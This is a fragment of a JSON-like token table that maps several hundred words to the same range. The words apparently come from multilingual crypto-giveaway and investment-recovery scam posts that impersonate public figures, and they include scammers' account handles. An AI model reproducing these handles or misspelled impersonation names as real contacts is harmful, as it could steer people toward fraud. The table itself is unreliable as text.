"\u0442\u043e\u0433\u043e": [0, 65535], "\u0441\u043f\u0443\u0441\u0442\u044f": [0, 65535], "\u0445\u0440\u0435\u043d": [0, 65535], "\u0437\u043d\u0430\u0435\u0442": [0, 65535], "\u0441\u043a\u043e\u043b\u044c\u043a\u043e": [0, 65535], "\u0435\u0449\u0451": [0, 65535], "\u0432\u0437\u044f\u043b\u0438": [0, 65535], "\u0437\u0430\u043c\u0443\u0436": [0, 65535], "\u043f\u043e\u0441\u043b\u0435": [0, 65535], "\u044d\u0442\u043e\u0433\u043e": [0, 65535], "\u043a\u043e\u0440\u043e\u0447\u0435": [0, 65535], "\u0432\u044b": [0, 65535], "\u043c\u043e\u0436\u0435\u0442\u0435": [0, 65535], "\u0447\u0438\u0442\u0430\u0442\u044c": [0, 65535], "\u0432\u0440\u0430\u0442\u044c": [0, 65535], "\u0431\u0443\u0434\u0443": [0, 65535], "\u0440\u0430\u0437": [0, 65535], "\u043d\u0443\u0436\u043d\u043e": [0, 65535], "\u043e\u0448\u0438\u0431\u043b\u0438\u0441\u044c": [0, 65535], "\u0436\u0438\u0437\u043d\u0438": [0, 65535], "\u043d\u0430\u0441\u0442\u043e\u043b\u044c\u043a\u043e": [0, 65535], "\u043d\u0435\u043d\u0430\u0432\u0438\u0434\u0438\u0442\u0435": [0, 65535], "\u0432\u043e\u0441\u0445\u0438\u0449\u0435\u043d\u044b": [0, 65535], "\u0432\u044f\u0442\u0440\u043e\u0432\u0438\u0447\u0435\u043c": [0, 65535], "\u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0430\u0435\u0442": [0, 65535], "\u0432\u0430\u0441": [0, 65535], "\u0447\u0442\u0435\u043d\u0438\u044f": [0, 65535], "\u0441\u043f\u0440\u043e\u0441\u0438\u0442\u0435": [0, 65535], "\u0435\u0451": [0, 65535], "\u043f\u043e\u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442": [0, 65535], "\u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u043c": [0, 65535], "\u043f\u043e\u0440\u044f\u0434\u043a\u0435": [0, 65535], "\u044d\u0440\u0438\u043a": [0, 65535], "\u043b\u0430\u0440\u0441\u043e\u043d": [0, 65535], "\u0441\u0442\u0440\u0430\u0445": [0, 65535], "\u043d\u0430\u0434\u0435\u0436\u0434\u0430": [0, 65535], "\u0445\u043e\u0442\u0435\u043b\u043e\u0441\u044c": [0, 65535], "\u043a\u043e\u043d\u0435\u0447\u043d\u043e": [0, 65535], "\u0441\u0442\u0440\u0430\u0445\u0430": [0, 65535], "\u0443\u043f\u0440\u0451\u043a\u0430": [0, 65535], "\u043f\u043e\u043a\u0430": [0, 65535], "\u0443\u043a\u0440\u0430\u0434\u0438\u0442\u0435": [0, 65535], "\u043d\u0430": [0, 65535], "\u0444": [0, 65535], "trades": [0, 65535], "stevenbrett": [0, 65535], "jgnebjlsk": [0, 65535], "mzu": [0, 65535], "deserves": [0, 65535], "testifying": [0, 65535], "testimony's": [0, 65535], "mighty": [0, 65535], "warriors": [0, 65535], "versus": [0, 65535], "propaganda": [0, 65535], "mother": [0, 65535], "crystal": [0, 65535], "xchange": [0, 65535], "tradefinance": [0, 65535], "eth": [0, 65535], "investor": [0, 65535], "colleagues": [0, 65535], "firm": [0, 65535], "begging": [0, 65535], "ypor": [0, 65535], "wz": [0, 65535], "njc": [0, 65535], "goodday": [0, 65535], "jxgdmw": [0, 65535], "vkynda": [0, 65535], "kyrz": [0, 65535], "vpvejkotdk": [0, 65535], "williamsmithfx": [0, 65535], "\u0431\u0443\u0442\u044b\u043b\u043e\u043a": [0, 65535], "\u0445\u0432\u0430\u0442\u0438\u0442": [0, 65535], "\u0432\u0441\u0435\u0445": [0, 65535], "\u0445\u0434": [0, 65535], "\u043f\u0440\u0438\u0441\u043b\u0430\u0442\u044c": [0, 65535], "\u043d\u043e\u0432\u043e\u0441\u0442\u044c": [0, 65535], "\u043d\u043e\u0432\u044b\u0439": [0, 65535], "\u0438\u043d\u0441\u0442\u0430\u0433\u0440\u0430\u043c": [0, 65535], "earan": [0, 65535], "uy": [0, 65535], "bv": [0, 65535], "shrt": [0, 65535], "dtkpj": [0, 65535], "tireless": [0, 65535], "analytical": [0, 65535], "specialists": [0, 65535], "analysts": [0, 65535], "skcnpecc": [0, 65535], "nocraska": [0, 65535], "mpu": [0, 65535], "sakaze": [0, 65535], "npomokoszy": [0, 65535], "rucom": [0, 65535], "xcnpecc": [0, 65535], "goctaska": [0, 65535], "saxaze": [0, 65535], "axaze": [0, 65535], "akaze": [0, 65535], "axasze": [0, 65535], "npomoxoszy": [0, 65535], "ikcnpecc": [0, 65535], "gocraea": [0, 65535], "kenpecc": [0, 65535], "qocraea": [0, 65535], "tsb": [0, 65535], "tome": [0, 65535], "paolo": [0, 65535], "qzzsmaffpp": [0, 65535], "zm": [0, 65535], "pqurvrs": [0, 65535], "absbdd": [0, 65535], "fccc": [0, 65535], "fc": [0, 65535], "replyall": [0, 65535], "ul": [0, 65535], "trfewklqqoeselb": [0, 65535], "zovs": [0, 65535], "msmskleg": [0, 65535], "ygzjx": [0, 65535], "glo": [0, 65535], "taylor": [0, 65535], "qg": [0, 65535], "ztz": [0, 65535], "zkvwqz": [0, 65535], "qwq": [0, 65535], "hdp": [0, 65535], "eed": [0, 65535], "feced": [0, 65535], "testimonies": [0, 65535], "assistance": [0, 65535], "claire": [0, 65535], "boucher": [0, 65535], "multidpticas": [0, 65535], "comprar": [0, 65535], "aprovecha": [0, 65535], "cham": [0, 65535], "monde": [0, 65535], "coronavirus": [0, 65535], "autriche": [0, 65535], "mesures": [0, 65535], "confinement": [0, 65535], "imminentes": [0, 65535], "pour": [0, 65535], "les": [0, 65535], "vaccin\u00e9s": [0, 65535], "reuters": [0, 65535], "lecture": [0, 65535], "gladys": [0, 65535], "valentine": [0, 65535], "gyxjv": [0, 65535], "pkborbugaeza": [0, 65535], "xsojv": [0, 65535], "ecek": [0, 65535], "noreply": [0, 65535], "cadre": [0, 65535], "trad": [0, 65535], "arore": [0, 65535], "aza": [0, 65535], "bongani": [0, 65535], "acd": [0, 65535], "cee": [0, 65535], "fdcf": [0, 65535], "vitalik": [0, 65535], "vitalikbuterin": [0, 65535], "ukrainians": [0, 65535], "proceeds": [0, 65535], "civilian": [0, 65535], "ether": [0, 65535], "retweets": [0, 65535], "tweets": [0, 65535], "iv": [0, 65535], "anael": [0, 65535], "ramos": [0, 65535], "shyanngorezany": [0, 65535], "vitaik": [0, 65535], "'m": [0, 65535], "bloomberg": [0, 65535], "vitalikbuteri": [0, 65535], "arms": [0, 65535], "fay": [0, 65535], "jeanne": [0, 65535], "morin": [0, 65535], "jazmin": [0, 65535], "guyss": [0, 65535], "participate": [0, 65535], "lke": [0, 65535], "puti": [0, 65535], "judith": [0, 65535], "edwards": [0, 65535], "lenorapaucek": [0, 65535], "achieved": [0, 65535], "machiavelli": [0, 65535], "ox": [0, 65535], "roberto": [0, 65535], "richards": [0, 65535], "jamesongraham": [0, 65535], "vita": [0, 65535], "ase": [0, 65535], "nilzete": [0, 65535], "mendes": [0, 65535], "kiravolff": [0, 65535], "yessin": [0, 65535], "uaa": [0, 65535], "elliottorp": [0, 65535], "happiest": [0, 65535], "shawn": [0, 65535], "watkins": [0, 65535], "masondurgan": [0, 65535], "giveaway": [0, 65535], "increased": [0, 65535], "cor": [0, 65535], "beatrice": [0, 65535], "vikene": [0, 65535], "iisa": [0, 65535], "qo": [0, 65535], "ne": [0, 65535], "wanda": [0, 65535], "mota": [0, 65535], "caden": [0, 65535], "sceptical": [0, 65535], "delight": [0, 65535], "martial": [0, 65535], "guillaume": [0, 65535], "darianabuckridge": [0, 65535], "lever": [0, 65535], "ose": [0, 65535], "oa": [0, 65535], "\u00e9": [0, 65535], "elonmusk": [0, 65535], "adoption": [0, 65535], "muskxdrop": [0, 65535], "yousef": [0, 65535], "hovda": [0, 65535], "kaseyblick": [0, 65535], "nie": [0, 65535], "kai": [0, 65535], "aubert": [0, 65535], "germaine": [0, 65535], "ud": [0, 65535], "emmerich": [0, 65535], "haider": [0, 65535], "gerlingbalsteri": [0, 65535], "ihave": [0, 65535], "tilda": [0, 65535], "blom": [0, 65535], "alanagusikowski": [0, 65535], "gelonmusk": [0, 65535], "gosh": [0, 65535], "aidn't": [0, 65535], "deed": [0, 65535], "ue": [0, 65535], "lawson": [0, 65535], "iyer": [0, 65535], "ws": [0, 65535], "atyptocurrency": [0, 65535], "shib": [0, 65535], "muskx": [0, 65535], "bk": [0, 65535], "femandino": [0, 65535], "rocha": [0, 65535], "qvince": [0, 65535], "repiying": [0, 65535], "econmusk": [0, 65535], "ater": [0, 65535], "adr": [0, 65535], "candela": [0, 65535], "barbosa": [0, 65535], "mari": [0, 65535], "repiving": [0, 65535], "etonmusk": [0, 65535], "wee": [0, 65535], "fret": [0, 65535], "walet": [0, 65535], "trom": [0, 65535], "dejan": [0, 65535], "olivier": [0, 65535], "sekozey": [0, 65535], "eonmusk": [0, 65535], "nave": [0, 65535], "ang": [0, 65535], "unbeleve": [0, 65535], "recoveres": [0, 65535], "eypto": [0, 65535], "purificacion": [0, 65535], "moya": [0, 65535], "marcus": [0, 65535], "etonmrusk": [0, 65535], "planing": [0, 65535], "rypto": [0, 65535], "stuts": [0, 65535], "ofthis": [0, 65535], "losses": [0, 65535], "arcrop": [0, 65535], "ust": [0, 65535], "mina": [0, 65535], "snivtoken": [0, 65535], "sai": [0, 65535], "shb": [0, 65535], "rasmus": [0, 65535], "johansen": [0, 65535], "elsworth": [0, 65535], "etners": [0, 65535], "colnbase": [0, 65535], "tiss": [0, 65535], "veried": [0, 65535], "etn": [0, 65535], "ob": [0, 65535], "jemwunseh": [0, 65535], "speedy": [0, 65535], "klaus": [0, 65535], "holetschek": [0, 65535], "redirects": [0, 65535], "thai": [0, 65535], "baht": [0, 65535], "intermediaries": [0, 65535], "cryptography": [0, 65535], "satoshi": [0, 65535], "nakamoto": [0, 65535], "\u00e9l": [0, 65535], "ch": [0, 65535], "denominations": [0, 65535], "criptomoneda": [0, 65535], "tipo": [0, 65535], "moneda": [0, 65535], "divisa": [0, 65535], "electronica": [0, 65535], "criptodivisa": [0, 65535], "ingl\u00e9s": [0, 65535], "criptoactivo": [0, 65535], "medio": [0, 65535], "intercambio": [0, 65535], "utiliza": [0, 65535], "criptografia": [0, 65535], "fuerte": [0, 65535], "asegurar": [0, 65535], "transacciones": [0, 65535], "controlar": [0, 65535], "creacio\u00e9n": [0, 65535], "unidades": [0, 65535], "adicionales": [0, 65535], "verificar": [0, 65535], "transferencia": [0, 65535], "activos": [0, 65535], "usando": [0, 65535], "tecnologias": [0, 65535], "registro": [0, 65535], "distribuido": [0, 65535], "existe": [0, 65535], "controversia": [0, 65535], "respecto": [0, 65535], "tienen": [0, 65535], "ser": [0, 65535], "descentralizado": [0, 65535], "monedas": [0, 65535], "centralizadas": [0, 65535], "bancos": [0, 65535], "cenirales": [0, 65535], "entidad": [0, 65535], "dejando": [0, 65535], "estas": [0, 65535], "entidades": [0, 65535], "centrales": [0, 65535], "funci\u00e9n": [0, 65535], "ninguna": [0, 65535], "podria": [0, 65535], "darse": [0, 65535], "caso": [0, 65535], "adoptara": [0, 65535], "masivamente": [0, 65535], "convertirse": [0, 65535], "fiduciaria": [0, 65535], "todo": [0, 65535], "planeta": [0, 65535], "generalmente": [0, 65535], "usan": [0, 65535], "lugar": [0, 65535], "banco": [0, 65535], "cbdc": [0, 65535], "iopened": [0, 65535], "profitbitminibtmi": [0, 65535], "west": [0, 65535], "xf": [0, 65535], "upjtozmmi": [0, 65535], "reward": [0, 65535], "mallockwilson": [0, 65535], "shape": [0, 65535], "fascism": [0, 65535], "soviet": [0, 65535], "soldiers": [0, 65535], "\u0430\u043b\u0435\u043a\u0441\u0435\u0439": [0, 65535], "\u0444\u0430\u0448\u0438\u0437\u043c\u0443": [0, 65535], "\u0444\u0430\u0448\u0438\u0437\u043c": [0, 65535], "\u0443\u043d\u0438\u0447\u0442\u043e\u0436\u0438\u043b\u0438": [0, 65535], "\u0441\u043e\u0432\u0435\u0442\u0441\u043a\u0438\u0435": [0, 65535], "\u0441\u043e\u043b\u0434\u0430\u0442\u044b": [0, 65535], "melissa": [0, 65535], "montgomery": [0, 65535], "vedafeil": [0, 65535], "aoe": [0, 65535], "havl": [0, 65535], "partook": [0, 65535], "reinardus": [0, 65535], "wille": [0, 65535], "vivianbauch": [0, 65535], "ethers": [0, 65535], "coinbase": [0, 65535], "carmona": [0, 65535], "angelicabergstrom": [0, 65535], "enlivened": [0, 65535], "oq": [0, 65535], "rosa": [0, 65535], "owens": [0, 65535], "chasitvohara": [0, 65535], "gates": [0, 65535], "gals": [0, 65535], "vvitalikbuterin": [0, 65535], "saab": [0, 65535], "vitalkbuterin": [0, 65535], "uz": [0, 65535], "vitalkfuterin": [0, 65535], "iwas": [0, 65535], "rubles": [0, 65535], "quiero": [0, 65535], "mas": [0, 65535], "gatos": [0, 65535], "crtpto": [0, 65535], "tengo": [0, 65535], "mucho": [0, 65535], "dinero": [0, 65535], "porque": [0, 65535], "compr\u00ed": [0, 65535], "bless": [0, 65535], "pzkh": [0, 65535], "lamento": [0, 65535], "haber": [0, 65535], "perturbado": [0, 65535], "inversi\u00f3n": [0, 65535], "l\u00ednea": [0, 65535], "estoy": [0, 65535], "muy": [0, 65535], "feliz": [0, 65535], "visto": [0, 65535], "empresa": [0, 65535], "criptoinversi\u00f3n": [0, 65535], "ofrece": [0, 65535], "inversores": [0, 65535], "p\u00e9rdida": [0, 65535], "fondos": [0, 65535], "confianza": [0, 65535], "aumentado": [0, 65535], "urs": [0, 65535], "mostrado": [0, 65535], "diferencia": [0, 65535], "entre": [0, 65535], "comercial": [0, 65535], "cual": [0, 65535], "puedo": [0, 65535], "decir": [0, 65535], "correcto": [0, 65535], "ganancias": [0, 65535], "altamente": [0, 65535], "valoradas": [0, 65535], "sistema": [0, 65535], "activa": [0, 65535], "autom\u00e1ticamente": [0, 65535], "cargos": [0, 65535], "extras": [0, 65535], "tantos": [0, 65535], "beneficios": [0, 65535], "m\u00ednimo": [0, 65535], "convi\u00e9rtete": [0, 65535], "realidad": [0, 65535], "tomas": [0, 65535], "medidas": [0, 65535], "tus": [0, 65535], "acciones": [0, 65535], "hacen": [0, 65535], "nos": [0, 65535], "rodea": [0, 65535], "sea": [0, 65535], "maravilloso": [0, 65535], "peque\u00f1o": [0, 65535], "pobre": [0, 65535], "probablemente": [0, 65535], "haya": [0, 65535], "tomado": [0, 65535], "poca": [0, 65535], "acci\u00f3n": [0, 65535], "tienes": [0, 65535], "coraje": [0, 65535], "empezar": [0, 65535], "ciertamente": [0, 65535], "triunfar": [0, 65535], "ven": [0, 65535], "triunfemos": [0, 65535], "juntos": [0, 65535], "arriba": [0, 65535], "echar": [0, 65535], "vistazo": [0, 65535], "p\u00e1gina": [0, 65535], "\u00fanase": [0, 65535], "compa\u00f1\u00eda": [0, 65535], "financiamiento": [0, 65535], "hoy": [0, 65535], "obtener": [0, 65535], "excelentes": [0, 65535], "\ud835\ude63\ud835\ude5a\ud835\ude6b\ud835\ude5a\ud835\ude67": [0, 65535], "\ud835\ude57\ud835\ude5a\ud835\ude61\ud835\ude5e\ud835\ude5a\ud835\ude6b\ud835\ude5a\ud835\ude59": [0, 65535], "\ud835\ude6a\ud835\ude63\ud835\ude69\ud835\ude5e\ud835\ude61": [0, 65535], "\ud835\ude5a\ud835\ude6d\ud835\ude65\ud835\ude5a\ud835\ude67\ud835\ude5e\ud835\ude5a\ud835\ude63\ud835\ude58\ud835\ude5a\ud835\ude59": [0, 65535], "\ud835\ude41\ud835\ude64\ud835\ude67": [0, 65535], "\ud835\ude59\ud835\ude5a\ud835\ude65\ud835\ude64\ud835\ude68\ud835\ude5e\ud835\ude69\ud835\ude5a\ud835\ude59": [0, 65535], "\ud835\ude69\ud835\ude5a\ud835\ude68\ud835\ude69": [0, 65535], "i\ud835\ude63": [0, 65535], "\ud835\ude5c\ud835\ude64\ud835\ude69": [0, 65535], "\ud835\ude57\ud835\ude56\ud835\ude58\ud835\ude60": [0, 65535], "\ud835\ude67\ud835\ude5a\ud835\ude69\ud835\ude6a\ud835\ude67\ud835\ude63\ud835\ude5a\ud835\ude59": [0, 65535], "\ud835\ude65\ud835\ude67\ud835\ude64\ud835\ude5b\ud835\ude5e\ud835\ude69": [0, 65535], "\ud835\ude62": [0, 65535], "yxopyiy": [0, 65535], "nemwyvdd": [0, 65535], "mgu": [0, 65535], "rebrand": [0, 65535], "bitsandblock": [0, 65535], "trbex": [0, 65535], "bitsand": [0, 65535], "trinh": [0, 65535], "belqv": [0, 65535], "ffz": [0, 65535], "vgaypgugovsxqtx": [0, 65535], "dj": [0, 65535], "aeeee": [0, 65535], "cdff": [0, 65535], "kianlucas": [0, 65535], "xj": [0, 65535], "owvk": [0, 65535], "owpricing": [0, 65535], "od": [0, 65535], "paes": [0, 65535], "comwithdrawal": [0, 65535], "sharpe": [0, 65535], "skiyz": [0, 65535], "ora": [0, 65535], "retwoots": [0, 65535], "renee": [0, 65535], "simmmons": [0, 65535], "machiavel": [0, 65535], "ernadete": [0, 65535], "cardoso": [0, 65535], "esensjankins": [0, 65535], "charles": [0, 65535], "emargacttekertzmann": [0, 65535], "als": [0, 65535], "naan": [0, 65535], "gashlighier": [0, 65535], "roman": [0, 65535], "ronnjeinaid": [0, 65535], "francisco": [0, 65535], "aguila": [0, 65535], "thereum": [0, 65535], "mugbcesnect": [0, 65535], "tesi": [0, 65535], "joyfrom": [0, 65535], "frnance": [0, 65535], "td": [0, 65535], "dear": [0, 65535], "victoria": [0, 65535], "authorize": [0, 65535], "welrethers": [0, 65535], "feadyioltalk": [0, 65535], "wn": [0, 65535], "rukfc": [0, 65535], "izda": [0, 65535], "magret": [0, 65535], "\u0274\u1d07\u1d20\u1d07\u0280": [0, 65535], "\u1d0b\u0274\u1d07\u1d21": [0, 65535], "\u1d21\u1d0f\u1d1c\u029f\u1d05": [0, 65535], "\u0299\u1d07": [0, 65535], "\u1d21\u029c\u1d00\u1d1b": [0, 65535], "\u026a'\u1d0d": [0, 65535], "\u1d1b\u1d0f\u1d05\u1d00\u028f": [0, 65535], "\ua731\u1d0f": [0, 65535], "\u1d0d\u1d1cc\u029c": [0, 65535], "\ua731\u1d1c\ua730\ua730\u1d07\u0280\u026a\u0274\u0262": [0, 65535], "\ua731\u1d00\u1d21": [0, 65535], "\u1d18\u1d0f\ua731\u1d1b": [0, 65535], "\u1d00\u0299\u1d0f\u1d1c\u1d1b": [0, 65535], "\u028f\u1d0f\u1d1c\u0280": [0, 65535], "\u1d18\u029f\u1d00\u1d1b\ua730\u1d0f\u0280\u1d0d": [0, 65535], "\u1d1b\u1d0f\u1d0f\u1d0b": [0, 65535], "\ua731\u1d1b\u1d07\u1d18": [0, 65535], "\u026a\ua730": [0, 65535], "\u026a\u1d1b'\ua731": [0, 65535], "\u0262\u1d0f\u026a\u0274\u0262": [0, 65535], "\u1d21\u1d0f\u0280\u1d0b": [0, 65535], "\u1d04\u029c\u1d00\u0274\u0262\u1d07\u1d05": [0, 65535], "\u029f\u026a\ua730\u1d07": [0, 65535], "\ua730\u026a\u0274\u1d00\u0274\u1d04\u026a\u1d00\u029f\u029f\u028f": [0, 65535], "\u1d0a\u1d1c\ua731\u1d1b": [0, 65535], "\u1d21\u1d00\u0274\u1d1b": [0, 65535], "\ua731\u029c\u1d00\u0280\u1d07": [0, 65535], "\u0262\u1d0f\u1d0f\u1d05": [0, 65535], "\u029f\u1d07\u1d1b": [0, 65535], "\u1d1b\u029c\u1d07": [0, 65535], "\u1d21\u1d0f\u0280\u029f\u1d05": [0, 65535], "\u1d0b\u0274\u1d0f\u1d21": [0, 65535], "\u0262\u0280\u1d07\u1d00\u1d1b": [0, 65535], "\u0280\u1d07\ua731\u1d18\u1d0f\u0274\ua731\u026a\u0299\u029f\u1d07": [0, 65535], "\u1d00\u0280\u1d07": [0, 65535], "\u1d04\u1d00\u0274": [0, 65535], "\u1d04\u1d0f\u0274\u1d1b\u1d00\u1d04\u1d1b": [0, 65535], "\u029c\u1d07\u0280": [0, 65535], "\u1d1b\u029c\u0280\u1d0f\u1d1c\u0262\u029c": [0, 65535], "\u1d1b\u029c\u026a\ua731": [0, 65535], "\u029f\u026a\u0274\u1d0b": [0, 65535], "utimateearn": [0, 65535], "\u1d05\u1d07\ua731\u1d18\u1d00\u026a\u0280": [0, 65535], "\u1d0f\ua730": [0, 65535], "\u1d1b\u029c\u1d07\u0280\u1d07": [0, 65535], "\ua731\u1d1b\u026a\u029f\u029f": [0, 65535], "\u029f\u1d07\u0262\u026a\u1d1b": [0, 65535], "\u1d18\u1d00\u028f\u026a\u0274\u0262": [0, 65535], "\u1d0f\u1d1c\u1d1b": [0, 65535], "\u1d00\u1d1b": [0, 65535], "\u1d04\u1d0f\u1d1c\u029f\u1d05\u0274": [0, 65535], "\u1d1b": [0, 65535], "\u0299\u1d07\u029f\u026a\u1d07\u1d20\u1d07": [0, 65535], "\u1d1c\u0274\u1d1b\u026a\u029f": [0, 65535], "\u1d1b\u0280\u026a\u1d07\u1d05": [0, 65535], "\u1d00\u1d0d": [0, 65535], "\u0280\u1d07\u1d00\u029f\u029f\u028f": [0, 65535], "\u0262\u0280\u1d00\u1d1b\u1d07\ua730\u1d1c\u029f": [0, 65535], "\u1d0d\u0280": [0, 65535], "lucas": [0, 65535], "doust": [0, 65535], "\u1d21\u029c\u1d0f": [0, 65535], "\u1d0d\u1d00\u1d05\u1d07": [0, 65535], "\u1d07\u1d00\ua731\u028f": [0, 65535], "\u1d00\u029f\u0280\u1d07\u1d00\u1d05\u028f": [0, 65535], "\u1d07\u1d00\u0280\u0274\u026a\u0274\u0262": [0, 65535], "\u1d00\u029f\ua731\u1d0f": [0, 65535], "\u0280\u1d07\u1d04\u1d0f\u1d20\u1d07\u0280\u026a\u0274\u0262": [0, 65535], "\u1d0d\u1d0f\u0274\u1d07\u028f": [0, 65535], "\u029c\u1d1c\u0262\u1d07": [0, 65535], "\u0280\u1d00\u1d1b\u1d07": [0, 65535], "\u0280\u1d07\u1d1b\u1d1c\u0280\u0274": [0, 65535], "\u1d04\u029f\u026a\u1d04\u1d0b": [0, 65535], "\u1d0f\u0274": [0, 65535], "\u0274\u1d00\u1d0d\u1d07": [0, 65535], "\u0299\u1d07\u029f\u1d0f\u1d21": [0, 65535], "\u029c\u026a\u1d0d": [0, 65535], "martinfx": [0, 65535], "cp": [0, 65535], "kbzyw": [0, 65535], "nti": [0, 65535], "gabrielribeirofx": [0, 65535], "proven": [0, 65535], "dime": [0, 65535], "lrmhpqxaoum": [0, 65535], "zwi": [0, 65535], "stealer": [0, 65535], "enjoyed": [0, 65535], "ungrateful": [0, 65535], "mixhaelowenfx": [0, 65535], "jpwcnysyrqw": [0, 65535], "vk": [0, 65535], "resources": [0, 65535], "efdaq": [0, 65535], "ezkmti": [0, 65535], "petal": [0, 65535], "ars": [0, 65535], "rene": [0, 65535], "peuare": [0, 65535], "eng": [0, 65535], "anon": [0, 65535], "cns": [0, 65535], "npn": [0, 65535], "hb": [0, 65535], "watson": [0, 65535], "\ud835\udc09\ud835\udc0e\ud835\udc08\ud835\udc0d": [0, 65535], "\ud835\udc13\ud835\udc07\ud835\udc04": [0, 65535], "\ud835\udc13\ud835\udc04\ud835\udc0b\ud835\udc04\ud835\udc06\ud835\udc11\ud835\udc00\ud835\udc0c": [0, 65535], "\ud835\udc06\ud835\udc11\ud835\udc0e\ud835\udc14\ud835\udc0f": [0, 65535], "\ud835\udc02\ud835\udc07\ud835\udc00\ud835\udc0d\ud835\udc0d\ud835\udc04\ud835\udc0b": [0, 65535], "\ud835\udc00\ud835\udc0d\ud835\udc03": [0, 65535], "\ud835\udc12\ud835\udc04\ud835\udc04": [0, 65535], "\ud835\udc00\ud835\udc0c\ud835\udc00\ud835\udc19\ud835\udc08\ud835\udc0d\ud835\udc06": [0, 65535], "\ud835\udc13\ud835\udc04\ud835\udc12\ud835\udc13\ud835\udc08\ud835\udc0c\ud835\udc0e\ud835\udc0d\ud835\udc18": [0, 65535], "\ud835\udc0e\ud835\udc05": [0, 65535], "\ud835\udc0f\ud835\udc04\ud835\udc0e\ud835\udc0f\ud835\udc0b\ud835\udc04": [0, 65535], "\ud835\udc11\ud835\udc04\ud835\udc06\ud835\udc00\ud835\udc11\ud835\udc03\ud835\udc08\ud835\udc0d\ud835\udc06": [0, 65535], "\ud835\udc13\ud835\udc07\ud835\udc08\ud835\udc12": [0, 65535], "\ud835\udc0f\ud835\udc0b\ud835\udc00\ud835\udc13\ud835\udc05\ud835\udc0e\ud835\udc11\ud835\udc0c": [0, 65535], "ellison": [0, 65535], "re\u0430ch": [0, 65535], "xdebltig": [0, 65535], "qxmzjk": [0, 65535], "\ud835\udc1e\ud835\udc31\ud835\udc29\ud835\udc1e\ud835\udc2b\ud835\udc22\ud835\udc1e\ud835\udc27\ud835\udc1c\ud835\udc1e\ud835\udc1d": [0, 65535], "\ud835\udc2c\ud835\udc28\ud835\udc26\ud835\udc1e": [0, 65535], "\ud835\udc2c\ud835\udc1e\ud835\udc2d\ud835\udc1b\ud835\udc1a\ud835\udc1c\ud835\udc24": [0, 65535], "\ud835\udc2d\ud835\udc2b\ud835\udc32\ud835\udc22\ud835\udc27\ud835\udc20": [0, 65535], "\ud835\udc01\ud835\udc22\ud835\udc2d\ud835\udc1c\ud835\udc28\ud835\udc22\ud835\udc27": [0, 65535], "\ud835\udc30\ud835\udc28\ud835\udc2b\ud835\udc24\ud835\udc22\ud835\udc27\ud835\udc20": [0, 65535], "\ud835\udc06\ud835\udc1e\ud835\udc28\ud835\udc2b\ud835\udc20\ud835\udc1e": [0, 65535], "\ud835\udc04\ud835\udc25\ud835\udc25\ud835\udc22\ud835\udc2c\ud835\udc28\ud835\udc27": [0, 65535], "\ud835\udc1f\ud835\udc1e\ud835\udc30": [0, 65535], "\ud835\udc30\ud835\udc1e\ud835\udc1e\ud835\udc24\ud835\udc2c": [0, 65535], "\ud835\udc1b\ud835\udc1e\ud835\udc1e\ud835\udc27": [0, 65535], "\ud835\udc1a\ud835\udc26\ud835\udc1a\ud835\udc33\ud835\udc22\ud835\udc27\ud835\udc20": [0, 65535], "\ud835\udc21\ud835\udc22\ud835\udc2c": [0, 65535], "\ud835\udc22\ud835\udc2c": [0, 65535], "\ud835\udc1b\ud835\udc1e\ud835\udc2c\ud835\udc2d": [0, 65535], "\ud835\udc29\ud835\udc25\ud835\udc1a\ud835\udc1c\ud835\udc1e": [0, 65535], "\ud835\udc2b\ud835\udc1a\ud835\udc2d\ud835\udc1e": [0, 65535], "\ud835\udc1c\ud835\udc28\ud835\udc26\ud835\udc29\ud835\udc25\ud835\udc1e\ud835\udc2d\ud835\udc1e\ud835\udc25\ud835\udc32": [0, 65535], "\ud835\udc1d\ud835\udc22\ud835\udc1f\ud835\udc1f\ud835\udc1e\ud835\udc2b\ud835\udc1e\ud835\udc27\ud835\udc2d": [0, 65535], "\ud835\udc1f\ud835\udc2b\ud835\udc28\ud835\udc26": [0, 65535], "\ud835\udc2d\ud835\udc21\ud835\udc1a\ud835\udc2d": [0, 65535], "\ud835\udc1f\ud835\udc1a\ud835\udc22\ud835\udc25\ud835\udc1e\ud835\udc1d": [0, 65535], "\ud835\udc13\ud835\udc21\ud835\udc1a\ud835\udc27\ud835\udc24": [0, 65535], "\ud835\udc1f\ud835\udc28\ud835\udc2e\ud835\udc27\ud835\udc1d": [0, 65535], "\ud835\udc21\ud835\udc22\ud835\udc26": [0, 65535], "\ud835\udc08'\ud835\udc26": [0, 65535], "\ud835\udc1e\ud835\udc27\ud835\udc23\ud835\udc28\ud835\udc32\ud835\udc22\ud835\udc27\ud835\udc20": [0, 65535], "\ud835\udc2b\ud835\udc1e\ud835\udc1c\ud835\udc1e\ud835\udc22\ud835\udc2f\ud835\udc22\ud835\udc27\ud835\udc20": [0, 65535], "\ud835\udc2b\ud835\udc1e\ud835\udc2d\ud835\udc2e\ud835\udc2b\ud835\udc27\ud835\udc2c": [0, 65535], "\ud835\udc25\ud835\udc22\ud835\udc24\ud835\udc1e": [0, 65535], "\ud835\udc1b\ud835\udc1e\ud835\udc1f\ud835\udc28\ud835\udc2b\ud835\udc1e": [0, 65535], "\ud835\udc1a\ud835\udc1d\ud835\udc2f\ud835\udc22\ud835\udc1c\ud835\udc1e": [0, 65535], "\ud835\udc1e\ud835\udc2f\ud835\udc1e\ud835\udc2b\ud835\udc32\ud835\udc28\ud835\udc27\ud835\udc1e": [0, 65535], "\ud835\udc2d\ud835\udc28\ud835\udc2e\ud835\udc1c\ud835\udc21": [0, 65535], "\ud835\udc2c\ud835\udc1e\ud835\udc1e": [0, 65535], "\ud835\udc20\ud835\udc28\ud835\udc1e\ud835\udc2c": [0, 65535], "crowd": [0, 65535], "joinchant": [0, 65535], "hjgxfjkknnnchhjv": [0, 65535], "tradewithraghee": [0, 65535], "hkjwskaw": [0, 65535], "ody": [0, 65535], "gnjcbok": [0, 65535], "djzjnk": [0, 65535], "meoebqqs": [0, 65535], "pinwe": [0, 65535], "subscribe": [0, 65535], "shopping": [0, 65535], "commentbitmin": [0, 65535], "\ud835\udc2c\ud835\udc22\ud835\udc2b": [0, 65535], "\ud835\udc1f\ud835\udc1a\ud835\udc26\ud835\udc22\ud835\udc25\ud835\udc32": [0, 65535], "\ud835\udc30\ud835\udc1e": [0, 65535], "\ud835\udc1c\ud835\udc1a\ud835\udc27": [0, 65535], "\ud835\udc1f\ud835\udc1e\ud835\udc1e\ud835\udc1d": [0, 65535], 